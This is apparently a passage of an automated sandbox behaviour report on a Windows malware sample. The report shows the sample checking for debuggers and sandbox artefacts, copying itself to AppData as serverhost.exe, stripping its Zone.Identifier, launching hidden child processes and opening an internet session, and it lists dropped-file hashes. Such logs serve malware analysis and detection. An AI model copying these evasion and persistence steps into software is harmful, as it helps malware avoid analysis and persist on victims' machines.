| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x765e33f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameA, address_out = 0x765c6ba9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameExA, address_out = 0x7661f41f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x765c8c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x7663bfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = VirtualAlloc, address_out = 0x765e2fb6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineA, address_out = 0x765e98ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x765e395c |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x772a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = cos, address_out = 0x772e7400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = sin, address_out = 0x772d41c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = strchr, address_out = 0x772e7690 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76b40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrStrIA, address_out = 0x76b4d250 |
|
1 | |
| Debug | Check for Presence | c:\users\bgc6u8~1\appdata\local\temp\42753.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| System | Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| File | Create | filename = C:\email.doc, desired_access = GENERIC_READ |
|
1 | |
| File | Create | filename = C:\a\foobar.bmp, desired_access = GENERIC_READ |
|
1 | |
| Module | Get Handle | module_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Filename | module_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 259 |
|
1 | |
| Debug | Check for Presence | c:\users\bgc6u8~1\appdata\local\temp\42753.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = MACA73F0A |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x77140000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x755b0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x74af0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x74180000 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 260 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| File | Create | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, filename = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, desired_access = FILE_MAP_READ |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, type = size |
|
1 | |
| Module | Unmap | process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| Mutex | Create | mutex_name = Global\I78B95E2E |
|
1 | |
| Mutex | Create | mutex_name = Global\M78B95E2E |
|
1 | |
| Mutex | Release | mutex_name = Global\I78B95E2E |
|
1 | |
| System | Get Time | type = Ticks, time = 85270 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 86284 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 87282 |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\, type = file_attributes |
|
1 | |
| File | Move | source_filename = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, destination_filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe |
|
1 | |
| File | Delete | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe:Zone.Identifier |
|
1 | |
| Process | Create | process_name = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, os_pid = 0xaf8, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:54, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:31 |
| Information | Value |
|---|---|
| PID | 0xaf8 |
| Parent PID | 0xae4 (c:\users\bgc6u8~1\appdata\local\temp\42753.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AFC
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Debug | Check for Presence | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x76890000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetMessagePos, address_out = 0x768c6703 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetCaretBlinkTime, address_out = 0x768a0d01 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fbc4 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fbe4 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x7651a4b4 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x765e33f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameA, address_out = 0x765c6ba9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameExA, address_out = 0x7661f41f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x765c8c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x7663bfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = VirtualAlloc, address_out = 0x765e2fb6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineA, address_out = 0x765e98ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x765e395c |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x772a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = cos, address_out = 0x772e7400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = sin, address_out = 0x772d41c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = strchr, address_out = 0x772e7690 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76b40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrStrIA, address_out = 0x76b4d250 |
|
1 | |
| Debug | Check for Presence | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| System | Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| File | Create | filename = C:\email.doc, desired_access = GENERIC_READ |
|
1 | |
| File | Create | filename = C:\a\foobar.bmp, desired_access = GENERIC_READ |
|
1 | |
| Module | Get Handle | module_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Filename | module_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 |
|
1 | |
| Debug | Check for Presence | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = MA991ED3B |
|
1 | |
| Process | Create | process_name = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, os_pid = 0xb04, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:56, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:29 |
| Information | Value |
|---|---|
| PID | 0xb04 |
| Parent PID | 0xaf8 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B08
0x
B0C
0x
B10
0x
B14
0x
B1C
0x
B20
0x
B24
0x
B2C
0x
B34
0x
B38
0x
B3C
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe | 92.00 KB (94208 bytes) |
MD5:
2b8584cab96d20ee851054f9fedef7f3
SHA1: de72320cc8fc12f2e410afa07809b620f81066dc SHA256: f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1 |
|
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat | 64.00 KB (65536 bytes) |
MD5:
e56a6538abf1d60544ce14111c423323
SHA1: f57cc7b3be0d2cf0b65d0397e76c73717bd1a96b SHA256: 0341e7374090ca82b3ff7c1a6cbfd85ebc48be5ec3135aaf183c0c0c7da993da |
|
|
| c:\users\bgc6u8oy yxgxkr\appdata\roaming\microsoft\windows\cookies\index.dat | 32.00 KB (32768 bytes) |
MD5:
e8289ca60a86329fef2726ababd2b99a
SHA1: a2567af5c9e4f7f9e9e08f5f8aec657a41692d4d SHA256: 33900323a9a4bdde6a22ee56a613f0dd67f275d3571321cdac54ea7321e244de |
|
|
| c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\index.dat | 64.00 KB (65536 bytes) |
MD5:
4d32b3456316311c50d77f7a37556236
SHA1: 47f9117eb7cf12bd3c36295b8084e98d962b6861 SHA256: 4ff606ec32478199d9183c9ec73ed4d0787f52ecc6504b7ce2d5cdf3ded0a5a6 |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Debug | Check for Presence | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x76890000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetMessagePos, address_out = 0x768c6703 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetCaretBlinkTime, address_out = 0x768a0d01 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fbc4 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fbe4 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x7651a4b4 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x765e33f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameA, address_out = 0x765c6ba9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameExA, address_out = 0x7661f41f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x765c8c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x7663bfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = VirtualAlloc, address_out = 0x765e2fb6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineA, address_out = 0x765e98ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x765e395c |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x772a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = cos, address_out = 0x772e7400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = sin, address_out = 0x772d41c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = strchr, address_out = 0x772e7690 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76b40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrStrIA, address_out = 0x76b4d250 |
|
1 | |
| Debug | Check for Presence | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| System | Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| File | Create | filename = C:\email.doc, desired_access = GENERIC_READ |
|
1 | |
| File | Create | filename = C:\a\foobar.bmp, desired_access = GENERIC_READ |
|
1 | |
| Module | Get Handle | module_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Filename | module_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 |
|
1 | |
| Debug | Check for Presence | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = MA991ED3B |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x77140000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x755b0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x74af0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x74180000 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, type = size |
|
1 | |
| Module | Unmap | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| Mutex | Create | mutex_name = Global\I78B95E2E |
|
1 | |
| Mutex | Create | mutex_name = Global\M78B95E2E |
|
1 | |
| Mutex | Release | mutex_name = Global\I78B95E2E |
|
1 | |
| System | Get Time | type = Ticks, time = 91853 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 92867 |
|
1 | |
| System | Get Time | type = Ticks, time = 96861 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 93865 |
|
1 | |
| System | Get Time | type = Ticks, time = 94864 |
|
1 | |
| System | Get Time | type = Ticks, time = 95862 |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
